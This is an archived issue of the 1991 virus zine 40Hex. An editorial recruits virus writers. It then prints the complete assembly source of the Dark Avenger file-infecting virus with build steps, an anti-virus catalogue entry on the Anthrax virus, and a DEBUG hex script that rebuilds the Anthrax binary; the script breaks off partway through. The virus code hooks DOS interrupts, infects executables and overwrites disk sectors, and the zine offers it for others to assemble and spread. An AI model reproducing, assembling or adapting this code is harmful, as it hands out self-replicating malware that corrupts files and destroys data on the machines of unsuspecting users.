💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › 40HEX › 40hex003 captured on 2022-06-12 at 10:05:17.
-=-=-=-=-=-=-
40Hex Issue 3 0000
Contents
--------
A Word From Hellraiser.......................................0001
The Dark Avenger Source......................................0002
Anthrax......................................................0003
The 40Hex Challenge/The Strange Case of Validate.............0004
Application for SKISM........................................0005
Virus News For October/91....................................0006
The Darth Vader Virus Strain B...............................0007
Mystery Virus................................................0008
Tiny-F Source................................................0009
Afterwords...................................................0010
Staff
-----
Hellraiser...............Editor/Writer/Programmer/Tech. Consultant
Garbage Heap.....................Writer/Spell Checker/Distribution
Special Thanks to... Demogorgan, Dark Angel, Count Zero, Piff',
Paragon Dude, The Fisch, Gambit, Punisher,
Nuclear Warhead, Ironlord (and the rest of
the alliance people all our freinds in PA, CT,
and all over the world, and most of all our
readers for your support.
SKISM distribution sites as of 10/91
Jihad - 1-(408)-XXX-XXXX : California
The Night Eyes BBS - 1-(717)-367-3501 : Pennsylvania
The Punishment Due BBS - 1-(203)-675-???? : Connecticut * DOWN *
40Hex Issue 3 0001
- Gray would be the color, if I had a heart.
Well what's up. Sorry about the delay with issue three
but there's been a lot of stuff going down. I've been
working on a lot of semi-legit projects and all that so
I haven't gotten around to 40Hex till now.
Anyway, first big news is this. SKISM has now co-oped
with the New York based group PHALCON, thus broadening
both groups span of diversity. SKISM being an all virus
group and PHALCON dealing with mainly h/p.
Secondly, SKISM is hoping to broaden its membership a
bit. We are looking for a few good virus writers.
Mainly what we need is some people who are very good
at assembly code and first and foremost virus writing.
Lame bomb writers, Q-Basic coders and such need not apply.
We are not just looking for IBM coders, as we are also
broading to Mac and Amiga.
Thirdly, SKISM gained a new HQ in PA., it is called Night
Eyes BBS. The number is (717)-367-3501, supporting
12/24/96/14.4 baud rates.
Finally, The Landfill BBS, whos number is listed as the
SKISM HQ in issue two, is no longer our HQ. Although
we are still on very good terms with the staff of that
BBS, please refrain from calling it with virus related
topics (they are no-longer h/p, just Amiga wares). Any-
way the new New York SKISM base should be up and running
by tops October. It will be called Hell On Earth and I
myself will be sysop.
Well enjoy...
- Hellraiser
-- Appendum --
Well about three days after writing this artical I found out
that I am being shipped to California. This sucks...
Well looks like Hell On Earth will be up out there instead of
New York.
Call our home boards to keep in touch with the situation. I
can still be left mail on Night Eyes.
-- Appendum B --
10/25/91
Well, it's been over a month since I wrote the above. Nothing
much has changed since then. I'm in CA. now and without a
system. Phalcon members have been going off -- mostly Dark Angel,
who has a new virus coming out, Bob Ross. I hope I can get it
for this issue.
Anyway, in other news The Punishment Due - Skism distribution
site has gone down. I am looking for other BBS's to add the
collection to.
More news... There is another Hell On Earth BBS out there so
it looks like I am going to have to change the name of my
BBS, when I get my system. Ironically I am concidering having
the other Hell On Earth as a Skism distribution site.
Even more news... I have been getting a lot of shit cause
of my name. There seems to be other Hellraisers out there,
who claim they were the first... Fuck you all! I had the name
since 1989, when I read Clive Barkers novella - "The Hellbound
Heart." If you had it before then, its yours. However after
calling a lot of boards nationally lately I never had a problem
logging on due to my name. Shows how lame people are.
Well thats it for now... Hope this issue will be out shortly.
40Hex Issue 3 0002
The Dark Avenger
- We are demons to some, angels to others.
Well, here it is. Here is the first major virus source, from the
man who brought us such greats as V2000, Anthrax, and V2100 to name
a few. Well this Bulgarian metal lover was nice enough to freely
distribute the source code to his first virus.
------------------------------------------------------------------------------
; "Blessed is he who expects nothing, for he shall not be disappointed."
; The original source of one of the first Bulgarian viruses is in front of
; you. As you may notice, it's full of rubbish and bugs, but nevertheless
; the virus has spread surprisingly quickly troughout the country and made a
; quick round the globe. (It's well-known in Eastern and Western Europe, as
; well as in USA.) Due to the aniversary of its creation, the source is
; distributed freely. You have the rights to distribute the source which can
; be charged or free of charge, with the only condition not to modify it.
; The one, who intentionaly distributes this source modified in any way will
; be punished! Still, the author will be glad if any of you improves it and
; spreads the resulting executive file (i.e., the virus itself). Pay
; attention to the fact that after you assemble the source, the resulting
; .COM-file cannot be run. For that purpose you have to create a three-byte
; file, consisting of the hex numbers 0e9h, 68h, 0 and then to combine the
; two files. Don't try to place a JMP at the beginning of the source.
; DISCLAIMER: The author does not take any responsability for any damage,
; either direct or implied, caused by the usage or not of this source or of
; the resulting code after assembly. No warrant is made about the product
; functionability or quality.
; I cannot resist to express my special gratitude to my "populazer" Dipl.
; eng. Vesselin Bontchev, who makes me famous and who, wishing it or
; not, helps very much in the spreading of my viruses, in spite of the fact
; that he tries to do just the opposite (writing programs in C has never
; led to any good).
; Greetings to all virus writers!
code segment
assume cs:code,ds:code
copyright:
db 'Eddie lives...somewhere in time!',0
date_stamp:
dd 12239000h
checksum:
db 30
; Return the control to an .EXE file:
; Restores DS=ES=PSP, loads SS:SP and CS:IP.
exit_exe:
mov bx,es
add bx,10h
add bx,word ptr cs:[si+call_adr+2]
mov word ptr cs:[si+patch+2],bx
mov bx,word ptr cs:[si+call_adr]
mov word ptr cs:[si+patch],bx
mov bx,es
add bx,10h
add bx,word ptr cs:[si+stack_pointer+2]
mov ss,bx
mov sp,word ptr cs:[si+stack_pointer]
db 0eah ;JMP XXXX:YYYY
patch:
dd 0
; Returns control to a .COM file:
; Restores the first 3 bytes in the
; beginning of the file, loads SP and IP.
exit_com:
mov di,100h
add si,offset my_save
movsb
movsw
mov sp,ds:[6] ;This is incorrect
xor bx,bx
push bx
jmp [si-11] ;si+call_adr-top_file
; Program entry point
startup:
call relative
relative:
pop si ;SI = $
sub si,offset relative
cld
cmp word ptr cs:[si+my_save],5a4dh
je exe_ok
cli
mov sp,si ;A separate stack is supported for
add sp,offset top_file+100h ;the .COM files, in order not to
sti ;overlap the stack by the program
cmp sp,ds:[6]
jnc exit_com
exe_ok:
push ax
push es
push si
push ds
mov di,si
; Looking for the address of INT 13h handler in ROM-BIOS
xor ax,ax
push ax
mov ds,ax
les ax,ds:[13h*4]
mov word ptr cs:[si+fdisk],ax
mov word ptr cs:[si+fdisk+2],es
mov word ptr cs:[si+disk],ax
mov word ptr cs:[si+disk+2],es
mov ax,ds:[40h*4+2] ;The INT 13h vector is moved to INT 40h
cmp ax,0f000h ;for diskettes if a hard disk is
jne nofdisk ;available
mov word ptr cs:[si+disk+2],ax
mov ax,ds:[40h*4]
mov word ptr cs:[si+disk],ax
mov dl,80h
mov ax,ds:[41h*4+2] ;INT 41h usually points the segment,
cmp ax,0f000h ;where the original INT 13h vector is
je isfdisk
cmp ah,0c8h
jc nofdisk
cmp ah,0f4h
jnc nofdisk
test al,7fh
jnz nofdisk
mov ds,ax
cmp ds:[0],0aa55h
jne nofdisk
mov dl,ds:[2]
isfdisk:
mov ds,ax
xor dh,dh
mov cl,9
shl dx,cl
mov cx,dx
xor si,si
findvect:
lodsw ;Occasionally begins with:
cmp ax,0fa80h ; CMP DL,80h
jne altchk ; JNC somewhere
lodsw
cmp ax,7380h
je intchk
jne nxt0
altchk:
cmp ax,0c2f6h ;or with:
jne nxt ; TEST DL,80h
lodsw ; JNZ somewhere
cmp ax,7580h
jne nxt0
intchk:
inc si ;then there is:
lodsw ; INT 40h
cmp ax,40cdh
je found
sub si,3
nxt0:
dec si
dec si
nxt:
dec si
loop findvect
jmp short nofdisk
found:
sub si,7
mov word ptr cs:[di+fdisk],si
mov word ptr cs:[di+fdisk+2],ds
nofdisk:
mov si,di
pop ds
; Check whether the program is present in memory:
les ax,ds:[21h*4]
mov word ptr cs:[si+save_int_21],ax
mov word ptr cs:[si+save_int_21+2],es
push cs
pop ds
cmp ax,offset int_21
jne bad_func
xor di,di
mov cx,offset my_size
scan_func:
lodsb
scasb
jne bad_func
loop scan_func
pop es
jmp go_program
; Move the program to the top of memory:
; (it's full of rubbish and bugs here)
bad_func:
pop es
mov ah,49h
int 21h
mov bx,0ffffh
mov ah,48h
int 21h
sub bx,(top_bz+my_bz+1ch-1)/16+2
jc go_program
mov cx,es
stc
adc cx,bx
mov ah,4ah
int 21h
mov bx,(offset top_bz+offset my_bz+1ch-1)/16+1
stc
sbb es:[2],bx
push es
mov es,cx
mov ah,4ah
int 21h
mov ax,es
dec ax
mov ds,ax
mov word ptr ds:[1],8
call mul_16
mov bx,ax
mov cx,dx
pop ds
mov ax,ds
call mul_16
add ax,ds:[6]
adc dx,0
sub ax,bx
sbb dx,cx
jc mem_ok
sub ds:[6],ax ;Reduction of the segment size
mem_ok:
pop si
push si
push ds
push cs
xor di,di
mov ds,di
lds ax,ds:[27h*4]
mov word ptr cs:[si+save_int_27],ax
mov word ptr cs:[si+save_int_27+2],ds
pop ds
mov cx,offset aux_size
rep movsb
xor ax,ax
mov ds,ax
mov ds:[21h*4],offset int_21;Intercept INT 21h and INT 27h
mov ds:[21h*4+2],es
mov ds:[27h*4],offset int_27
mov ds:[27h*4+2],es
mov word ptr es:[filehndl],ax
pop es
go_program:
pop si
; Smash the next disk sector:
xor ax,ax
mov ds,ax
mov ax,ds:[13h*4]
mov word ptr cs:[si+save_int_13],ax
mov ax,ds:[13h*4+2]
mov word ptr cs:[si+save_int_13+2],ax
mov ds:[13h*4],offset int_13
add ds:[13h*4],si
mov ds:[13h*4+2],cs
pop ds
push ds
push si
mov bx,si
lds ax,ds:[2ah]
xor si,si
mov dx,si
scan_envir: ;Fetch program's name
lodsw ;(with DOS 2.x it doesn't work anyway)
dec si
test ax,ax
jnz scan_envir
add si,3
lodsb
; The following instruction is a complete nonsense. Try to enter a drive &
; directory path in lowercase, then run an infected program from there.
; As a result of an error here + an error in DOS the next sector is not
; smashed. Two memory bytes are smashed instead, most probably onto the
; infected program.
sub al,'A'
mov cx,1
push cs
pop ds
add bx,offset int_27
push ax
push bx
push cx
int 25h
pop ax
pop cx
pop bx
inc byte ptr [bx+0ah]
and byte ptr [bx+0ah],0fh ;It seems that 15 times doing
jnz store_sec ;nothing is not enough for some.
mov al,[bx+10h]
xor ah,ah
mul word ptr [bx+16h]
add ax,[bx+0eh]
push ax
mov ax,[bx+11h]
mov dx,32
mul dx
div word ptr [bx+0bh]
pop dx
add dx,ax
mov ax,[bx+8]
add ax,40h
cmp ax,[bx+13h]
jc store_new
inc ax
and ax,3fh
add ax,dx
cmp ax,[bx+13h]
jnc small_disk
store_new:
mov [bx+8],ax
store_sec:
pop ax
xor dx,dx
push ax
push bx
push cx
int 26h
; The writing trough this interrupt is not the smartest thing, bacause it
; can be intercepted (what Vesselin Bontchev has managed to notice).
pop ax
pop cx
pop bx
pop ax
cmp byte ptr [bx+0ah],0
jne not_now
mov dx,[bx+8]
pop bx
push bx
int 26h
small_disk:
pop ax
not_now:
pop si
xor ax,ax
mov ds,ax
mov ax,word ptr cs:[si+save_int_13]
mov ds:[13h*4],ax
mov ax,word ptr cs:[si+save_int_13+2]
mov ds:[13h*4+2],ax
pop ds
pop ax
cmp word ptr cs:[si+my_save],5a4dh
jne go_exit_com
jmp exit_exe
go_exit_com:
jmp exit_com
int_24:
mov al,3 ;This instruction seems unnecessary
iret
; INT 27h handler (this is necessary)
int_27:
pushf
call alloc
popf
jmp dword ptr cs:[save_int_27]
; During the DOS functions Set & Get Vector it seems that the virus has not
; intercepted them (this is a doubtfull advantage and it is a possible
; source of errors with some "intelligent" programs)
set_int_27:
mov word ptr cs:[save_int_27],dx
mov word ptr cs:[save_int_27+2],ds
popf
iret
set_int_21:
mov word ptr cs:[save_int_21],dx
mov word ptr cs:[save_int_21+2],ds
popf
iret
get_int_27:
les bx,dword ptr cs:[save_int_27]
popf
iret
get_int_21:
les bx,dword ptr cs:[save_int_21]
popf
iret
exec:
call do_file
call alloc
popf
jmp dword ptr cs:[save_int_21]
db 'Diana P.',0
; INT 21h handler. Infects files during execution, copying, browsing or
; creating and some other operations. The execution of functions 0 and 26h
; has bad consequences.
int_21:
push bp
mov bp,sp
push [bp+6]
popf
pop bp
pushf
call ontop
cmp ax,2521h
je set_int_21
cmp ax,2527h
je set_int_27
cmp ax,3521h
je get_int_21
cmp ax,3527h
je get_int_27
cld
cmp ax,4b00h
je exec
cmp ah,3ch
je create
cmp ah,3eh
je close
cmp ah,5bh
jne not_create
create:
cmp word ptr cs:[filehndl],0;May be 0 if the file is open
jne dont_touch
call see_name
jnz dont_touch
call alloc
popf
call function
jc int_exit
pushf
push es
push cs
pop es
push si
push di
push cx
push ax
mov di,offset filehndl
stosw
mov si,dx
mov cx,65
move_name:
lodsb
stosb
test al,al
jz all_ok
loop move_name
mov word ptr es:[filehndl],cx
all_ok:
pop ax
pop cx
pop di
pop si
pop es
go_exit:
popf
jnc int_exit ;JMP
close:
cmp bx,word ptr cs:[filehndl]
jne dont_touch
test bx,bx
jz dont_touch
call alloc
popf
call function
jc int_exit
pushf
push ds
push cs
pop ds
push dx
mov dx,offset filehndl+2
call do_file
mov word ptr cs:[filehndl],0
pop dx
pop ds
jmp go_exit
not_create:
cmp ah,3dh
je touch
cmp ah,43h
je touch
cmp ah,56h ;Unfortunately, the command inter-
jne dont_touch ;preter does not use this function
touch:
call see_name
jnz dont_touch
call do_file
dont_touch:
call alloc
popf
call function
int_exit:
pushf
push ds
call get_chain
mov byte ptr ds:[0],'Z'
pop ds
popf
dummy proc far ;???
ret 2
dummy endp
; Checks whether the file is .COM or .EXE.
; It is not called upon file execution.
see_name:
push ax
push si
mov si,dx
scan_name:
lodsb
test al,al
jz bad_name
cmp al,'.'
jnz scan_name
call get_byte
mov ah,al
call get_byte
cmp ax,'co'
jz pos_com
cmp ax,'ex'
jnz good_name
call get_byte
cmp al,'e'
jmp short good_name
pos_com:
call get_byte
cmp al,'m'
jmp short good_name
bad_name:
inc al
good_name:
pop si
pop ax
ret
; Converts into lowercase (the subroutines are a great thing).
get_byte:
lodsb
cmp al,'C'
jc byte_got
cmp al,'Y'
jnc byte_got
add al,20h
byte_got:
ret
; Calls the original INT 21h.
function:
pushf
call dword ptr cs:[save_int_21]
ret
; Arrange to infect an executable file.
do_file:
push ds ;Save the registers in stack
push es
push si
push di
push ax
push bx
push cx
push dx
mov si,ds
xor ax,ax
mov ds,ax
les ax,ds:[24h*4] ;Saves INT 13h and INT 24h in stack
push es ;and changes them with what is needed
push ax
mov ds:[24h*4],offset int_24
mov ds:[24h*4+2],cs
les ax,ds:[13h*4]
mov word ptr cs:[save_int_13],ax
mov word ptr cs:[save_int_13+2],es
mov ds:[13h*4],offset int_13
mov ds:[13h*4+2],cs
push es
push ax
mov ds,si
xor cx,cx ;Arranges to infect Read-only files
mov ax,4300h
call function
mov bx,cx
and cl,0feh
cmp cl,bl
je dont_change
mov ax,4301h
call function
stc
dont_change:
pushf
push ds
push dx
push bx
mov ax,3d02h ;Now we can safely open the file
call function
jc cant_open
mov bx,ax
call disease
mov ah,3eh ;Close it
call function
cant_open:
pop cx
pop dx
pop ds
popf
jnc no_update
mov ax,4301h ;Restores file's attributes
call function ;if they were changed (just in case)
no_update:
xor ax,ax ;Restores INT 13h and INT 24h
mov ds,ax
pop ds:[13h*4]
pop ds:[13h*4+2]
pop ds:[24h*4]
pop ds:[24h*4+2]
pop dx ;Register restoration
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
ret
; This routine is the working horse.
disease:
push cs
pop ds
push cs
pop es
mov dx,offset top_save ;Read the file beginning
mov cx,18h
mov ah,3fh
int 21h
xor cx,cx
xor dx,dx
mov ax,4202h ;Save file length
int 21h
mov word ptr [top_save+1ah],dx
cmp ax,offset my_size ;This should be top_file
sbb dx,0
jc stop_fuck_2 ;Small files are not infected
mov word ptr [top_save+18h],ax
cmp word ptr [top_save],5a4dh
jne com_file
mov ax,word ptr [top_save+8]
add ax,word ptr [top_save+16h]
call mul_16
add ax,word ptr [top_save+14h]
adc dx,0
mov cx,dx
mov dx,ax
jmp short see_sick
com_file:
cmp byte ptr [top_save],0e9h
jne see_fuck
mov dx,word ptr [top_save+1]
add dx,103h
jc see_fuck
dec dh
xor cx,cx
; Check if the file is properly infected
see_sick:
sub dx,startup-copyright
sbb cx,0
mov ax,4200h
int 21h
add ax,offset top_file
adc dx,0
cmp ax,word ptr [top_save+18h]
jne see_fuck
cmp dx,word ptr [top_save+1ah]
jne see_fuck
mov dx,offset top_save+1ch
mov si,dx
mov cx,offset my_size
mov ah,3fh
int 21h
jc see_fuck
cmp cx,ax
jne see_fuck
xor di,di
next_byte:
lodsb
scasb
jne see_fuck
loop next_byte
stop_fuck_2:
ret
see_fuck:
xor cx,cx ;Seek to the end of file
xor dx,dx
mov ax,4202h
int 21h
cmp word ptr [top_save],5a4dh
je fuck_exe
add ax,offset aux_size+200h ;Watch out for too big .COM files
adc dx,0
je fuck_it
ret
; Pad .EXE files to paragraph boundary. This is absolutely unnecessary.
fuck_exe:
mov dx,word ptr [top_save+18h]
neg dl
and dx,0fh
xor cx,cx
mov ax,4201h
int 21h
mov word ptr [top_save+18h],ax
mov word ptr [top_save+1ah],dx
fuck_it:
mov ax,5700h ;Get file's date
int 21h
pushf
push cx
push dx
cmp word ptr [top_save],5a4dh
je exe_file ;Very clever, isn't it?
mov ax,100h
jmp short set_adr
exe_file:
mov ax,word ptr [top_save+14h]
mov dx,word ptr [top_save+16h]
set_adr:
mov di,offset call_adr
stosw
mov ax,dx
stosw
mov ax,word ptr [top_save+10h]
stosw
mov ax,word ptr [top_save+0eh]
stosw
mov si,offset top_save ;This offers the possibilities to
movsb ;some nasty programs to restore
movsw ;exactly the original length
xor dx,dx ;of the .EXE files
mov cx,offset top_file
mov ah,40h
int 21h ;Write the virus
jc go_no_fuck ;(don't trace here)
xor cx,ax
jnz go_no_fuck
mov dx,cx
mov ax,4200h
int 21h
cmp word ptr [top_save],5a4dh
je do_exe
mov byte ptr [top_save],0e9h
mov ax,word ptr [top_save+18h]
add ax,startup-copyright-3
mov word ptr [top_save+1],ax
mov cx,3
jmp short write_header
go_no_fuck:
jmp short no_fuck
; Construct the .EXE file's header
do_exe:
call mul_hdr
not ax
not dx
inc ax
jne calc_offs
inc dx
calc_offs:
add ax,word ptr [top_save+18h]
adc dx,word ptr [top_save+1ah]
mov cx,10h
div cx
mov word ptr [top_save+14h],startup-copyright
mov word ptr [top_save+16h],ax
add ax,(offset top_file-offset copyright-1)/16+1
mov word ptr [top_save+0eh],ax
mov word ptr [top_save+10h],100h
add word ptr [top_save+18h],offset top_file
adc word ptr [top_save+1ah],0
mov ax,word ptr [top_save+18h]
and ax,1ffh
mov word ptr [top_save+2],ax
pushf
mov ax,word ptr [top_save+19h]
shr byte ptr [top_save+1bh],1
rcr ax,1
popf
jz update_len
inc ax
update_len:
mov word ptr [top_save+4],ax
mov cx,18h
write_header:
mov dx,offset top_save
mov ah,40h
int 21h ;Write the file beginning
no_fuck:
pop dx
pop cx
popf
jc stop_fuck
mov ax,5701h ;Restore the original file date
int 21h
stop_fuck:
ret
; The following is used by the INT 21h and INT 27h handlers in connection
; to the program hiding in memory from those who don't need to see it.
; The whole system is absurde and meaningless and it is also another source
; for program conflicts.
alloc:
push ds
call get_chain
mov byte ptr ds:[0],'M'
pop ds
; Assures that the program is the first one in the processes,
; which have intercepted INT 21h (yet another source of conflicts).
ontop:
push ds
push ax
push bx
push dx
xor bx,bx
mov ds,bx
lds dx,ds:[21h*4]
cmp dx,offset int_21
jne search_segment
mov ax,ds
mov bx,cs
cmp ax,bx
je test_complete
; Searches the segment of the sucker who has intercepted INT 21h, in
; order to find where it has stored the old values and to replace them.
; Nothing is done for INT 27h.
xor bx,bx
search_segment:
mov ax,[bx]
cmp ax,offset int_21
jne search_next
mov ax,cs
cmp ax,[bx+2]
je got_him
search_next:
inc bx
jne search_segment
je return_control
got_him:
mov ax,word ptr cs:[save_int_21]
mov [bx],ax
mov ax,word ptr cs:[save_int_21+2]
mov [bx+2],ax
mov word ptr cs:[save_int_21],dx
mov word ptr cs:[save_int_21+2],ds
xor bx,bx
; Even if he has not saved them in the same segment, this won't help him.
return_control:
mov ds,bx
mov ds:[21h*4],offset int_21
mov ds:[21h*4+2],cs
test_complete:
pop dx
pop bx
pop ax
pop ds
ret
; Fetch the segment of the last MCB
get_chain:
push ax
push bx
mov ah,62h
call function
mov ax,cs
dec ax
dec bx
next_blk:
mov ds,bx
stc
adc bx,ds:[3]
cmp bx,ax
jc next_blk
pop bx
pop ax
ret
; Multiply by 16
mul_hdr:
mov ax,word ptr [top_save+8]
mul_16:
mov dx,10h
mul dx
ret
db 'This program was written in the city of Sofia '
db '(C) 1988-89 Dark Avenger',0
; INT 13h handler.
; Calls the original vectors in BIOS, if it's a writing call
int_13:
cmp ah,3
jnz subfn_ok
cmp dl,80h
jnc hdisk
db 0eah ;JMP XXXX:YYYY
my_size: ;--- Up to here comparison
disk: ; with the original is made
dd 0
hdisk:
db 0eah ;JMP XXXX:YYYY
fdisk:
dd 0
subfn_ok:
db 0eah ;JMP XXXX:YYYY
save_int_13:
dd 0
call_adr:
dd 100h
stack_pointer:
dd 0 ;The original value of SS:SP
my_save:
int 20h ;The original contents of the first
nop ;3 bytes of the file
top_file: ;--- Up to here the code is written
filehndl equ $ ; in the files
filename equ filehndl+2 ;Buffer for the name of the opened file
save_int_27 equ filename+65 ;Original INT 27h vector
save_int_21 equ save_int_27+4 ;Original INT 21h vector
aux_size equ save_int_21+4 ;--- Up to here is moved into memory
top_save equ save_int_21+4 ;Beginning of the buffer, which
;contains
; - The first 24 bytes read from file
; - File length (4 bytes)
; - The last bytes of the file
; (my_size bytes)
top_bz equ top_save-copyright
my_bz equ my_size-copyright
code ends
end
------------------------------------------------------------------------------
A few notes on assembling this virus.
It's a little bit tricky assembling the Dark Avenger Virus. Use
these steps below. I use Turbo Assembler 2.0, but I'm positve that
MASM will work just as well.
1:
TASM AVENGER.ASM
2:
TLINK AVENGER.OBJ
3:
EXE2BIN AVENGER AVENGER.COM
Now make a 3 byte file named JUMP.TMP using DEBUG like this
4: DEBUG
n jmp.tmp
e 0100 E9 68 00
rcx
3
w
q
5: Now do this COPY JMP.TMP + AVENGER.COM DAVENGER.COM
There you have it....
HR
40Hex Issue 3 0003
Anthrax
Well, this is turning out to be a tribute issue to the Dark
Avenger. Here is another one of his better known viruses. This is
a nice one cause it not only is a file infector, but it is also a
sort of boot sector virus. It is also what I dubbed a reincarnation
virus, meaning that even if you clean your system of it, it may
still live, because it leaves a copy of itself on the last sector of
the disk. The virus can be reincarnated by the V2100 virus, also bu
The Dark Avenger.
Well, Patti Hoffman (one of my favorite people on earth, not) wrote
this virus up.
Aliases:
V Status: Rare [Not for long]
Discovery: July, 1990
Symptoms: .COM & .EXE growth
Origin: Bulgaria
Isolated: Netherlands
Eff Length: 1040 - 1279 Bytes
Type Code: PRAKX - Parasitic Resident .COM, .EXE, & Partition Table Infector
Detection Method: ViruScan V66+, Pro-Scan 2.01+, IBM Scan 2.00+
Removal Instructions: Scan/D + MDisk/P, Pro-Scan 2.01+
General Comments:
The Anthrax Virus was isolated in July 1990 in the Netherlands after
it was uploaded onto several BBSes in a trojan anti-viral program,
USCAN.ZIP. It is the second virus to be found in a copy of UScan
during July 1990, the first virus being V2100. Anthrax is a memory
resident generic infector of .COM and .EXE files, including
COMMAND.COM.
The first time a program infected with the Anthrax virus is executed
on the system's hard disk, the virus will infect the hard disk's
partition table. At this point, the virus is not memory resident. It
will also write a copy of itself on the last few sectors of the
system's hard disk. If data existed on those last few sectors of the
hard disk, it will be destroyed.
When the system is booted from the hard disk, the Anthrax virus
will install itself memory resident. It will remain memory resident
until the first program is executed. At that time, it will deinstall
itself from being resident and infect one .COM or .EXE file. This
virus does not infect files in the current directory first, but
instead starts to infect files at the lowest level of the disk's
directory tree.
Later, when an infected program is executed, Anthrax will infect one
.COM or .EXE file, searching the directory structure from the lowest
level of the directory tree. If the executed infected program
was located on the floppy drive, a .COM or .EXE file may or may not
be infected.
The Anthrax Virus's code is 1,024 bytes long, but infected programs
will increase in length by 1,040 to 1,279 bytes. On the author's test
system, the largest increase in length experienced was 1,232 bytes.
Infected files will always have an infected file length that is a
multiple of 16.
The following text strings can be found in files infected with the
Anthrax virus:
"(c)Damage, Inc."
"ANTHRAX"
A third text string occurs in the viral code, but it is in Cyrillics.
Per Vesselin Bontchev, this third string translates to: "Sofia 1990".
Since Anthrax infects the hard disk partition tables, infected systems
must have the partition table disinfected or rebuilt in order to
remove the virus. This disinfection can be done with either a low-
level format or use of the MDisk/P program for the correct DOS
version after powering off and rebooting from a write-protected boot
diskette for the system. Any .COM or .EXE files infected with
Anthrax must also be disinfected or erased. Since a copy of the virus
will exist on the last few sectors of the drive, these must also be
located and overwritten.
Anthrax interacts with another virus: V2100. If a system which was
previously infected with Anthrax should become infected with the V2100
virus, the V2100 virus will check the last few sectors of the hard
disk for the spare copy of Anthrax. If the spare copy is found, then
Anthrax will be copied to the hard disk's partition table.
It is not known if Anthrax carries any destructive capabilities or
trigger/activation dates.
Here is the actual virus. Well if this is your fist copy of
40Hex, let me explain how to compile it.
First copy what is below with your editor. Then save it to a file
called ANTHRAX.SCR. Then type at the command line -
DEBUG <ANTHRAX.SCR
This will create a file called ANTHRAX.COM, that's the actual virus.
-------------------------------------------------------------------------------
n anthrax.com
e 0100 E9 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0110 95 8C C8 2D 00 00 BA 00 00 50 52 1E 33 C9 8E D9
e 0120 BE 4C 00 B8 CD 00 8C CA 87 44 44 87 54 46 52 50
e 0130 C4 1C B4 13 CD 2F 06 53 B4 13 CD 2F 58 5A 87 04
e 0140 87 54 02 52 50 51 56 A0 3F 04 A8 0F 75 6C 0E 07
e 0150 BA 80 00 B1 03 BB 77 06 B8 01 02 50 CD 13 58 B1
e 0160 01 BB 00 04 CD 13 0E 1F BE 9B 03 8B FB B9 5E 00
e 0170 56 F3 A6 5E 8B FB B9 62 00 56 F3 A4 5F BE 12 08
e 0180 B9 65 00 F3 A4 74 1E 89 4D E9 B1 5C 89 4D 9B 88
e 0190 6D DC B1 02 33 DB B8 02 03 CD 13 49 BB 00 04 B8
e 01A0 01 03 CD 13 49 B4 19 CD 21 50 B2 02 B4 0E CD 21
e 01B0 B7 02 E8 87 01 5A B4 0E CD 21 5E 1F 8F 04 8F 44
e 01C0 02 8F 44 44 8F 44 46 1F 1E 07 95 CB 28 63 29 20
e 01D0 44 61 6D 61 67 65 2C 20 49 6E 63 2E 00 B0 03 CF
e 01E0 06 1E 57 56 50 33 C0 8E D8 BE 86 00 0E 07 BF 08
e 01F0 06 FD AD AB A5 AF 87 F7 AD FC 74 11 1E 07 AF B8
e 0200 07 01 AB 8C C8 AB 8E D8 BF 68 00 A5 A5 58 5E 5F
e 0210 1F 07 2E FF 2E 00 06 06 1E 57 56 52 51 53 50 0E
e 0220 1F BE 06 06 33 C9 8E C1 BF 84 00 A5 A5 B4 52 CD
e 0230 21 26 8B 47 FE 8E D8 BB 03 00 03 07 40 8E D8 81
e 0240 07 80 00 0E 07 B7 12 E8 F2 00 58 5B 59 5A 5E 5F
e 0250 1F 07 2E FF 2E 06 06 C3 91 AE B4 A8 BF 20 31 39
e 0260 39 30 B8 00 3D CD 21 72 EE 93 B8 20 12 CD 2F 53
e 0270 26 8A 1D B8 16 12 CD 2F 5B BE 62 04 8B D6 B1 18
e 0280 B4 3F CD 21 33 C1 75 70 06 1F C6 45 02 02 33 D2
e 0290 EC 3C 10 72 FB 03 45 11 13 55 13 24 F0 3D 00 FB
e 02A0 73 56 89 45 15 89 55 17 0E 1F 50 B1 10 F7 F1 2B
e 02B0 44 08 8B C8 2B 44 16 A3 04 00 AD 35 4D 5A 74 03
e 02C0 35 17 17 9C 75 17 89 04 3B 44 0A 87 44 12 A3 07
e 02D0 00 89 4C 14 B9 DC 04 74 07 83 44 08 48 B9 65 00
e 02E0 51 B9 9B 03 B4 40 CD 21 33 C8 59 75 09 BA 00 04
e 02F0 B4 40 CD 21 33 C8 5A 58 75 38 26 89 4D 15 26 89
e 0300 4D 17 52 9D 75 18 26 8B 45 11 26 8B 55 13 B5 02
e 0310 F7 F1 85 D2 74 01 40 89 14 89 44 02 EB 0A C6 44
e 0320 FE E9 05 28 03 89 44 FF B9 18 00 8D 54 FE B4 40
e 0330 CD 21 26 80 4D 06 40 B4 3E CD 21 C3 8E D9 8A 1E
e 0340 6C 04 0E 1F FF 06 5E 04 BA 4B 06 E8 1F 00 BE 0A
e 0350 06 C6 04 5C 46 32 D2 B4 47 CD 21 BA 9B 03 B4 3B
e 0360 CD 21 E3 0D B4 51 CD 21 8E DB BA 80 00 B4 1A EB
e 0370 C8 72 3E BE 9C 03 32 D2 B4 47 CD 21 3A 2E DC 03
e 0380 B1 32 BA 9D 02 B4 4E 74 5C CD 21 72 24 BA 4B 06
e 0390 B8 01 4F BE DC 03 BF 68 06 AA B1 0D F3 A6 74 45
e 03A0 3A 6D FE 74 40 CD 21 73 E4 32 C0 EB D3 2A 2E 2A
e 03B0 00 B1 41 BF 9C 03 3A 2D 8A C5 A2 DC 03 74 69 F2
e 03C0 AE 4F B1 41 B0 5C FD F2 AE 8D 75 02 BF DC 03 FC
e 03D0 AC 84 C0 AA 75 FA BA CD 02 32 C9 EB 81 2E 2E 00
e 03E0 BA 4B 06 B4 4F CD 21 72 C8 BE 69 06 BF DC 03 80
e 03F0 3C 2E 74 EC 88 2D 8B D6 F6 44 F7 10 75 DB AC 84
e 0400 C0 AA 75 FA 4E FD AD AD FC 3D 58 45 74 05 3D 4F
e 0410 4D 75 CD 53 E8 4B FE 5B 33 C9 8E C1 26 A0 6C 04
e 0420 0E 07 2A C3 3A C7 72 B8 BA 80 00 B1 03 BB 00 02
e 0430 B8 01 03 CD 13 BA 0A 06 E9 23 FF 95 BF 00 01 8B
e 0440 5D 01 81 EB 28 02 8B C7 8D B7 FD 03 A5 A4 93 B1
e 0450 04 D3 E8 8C D9 03 C1 BA 0B 00 EB 71 B8 D0 00 FC
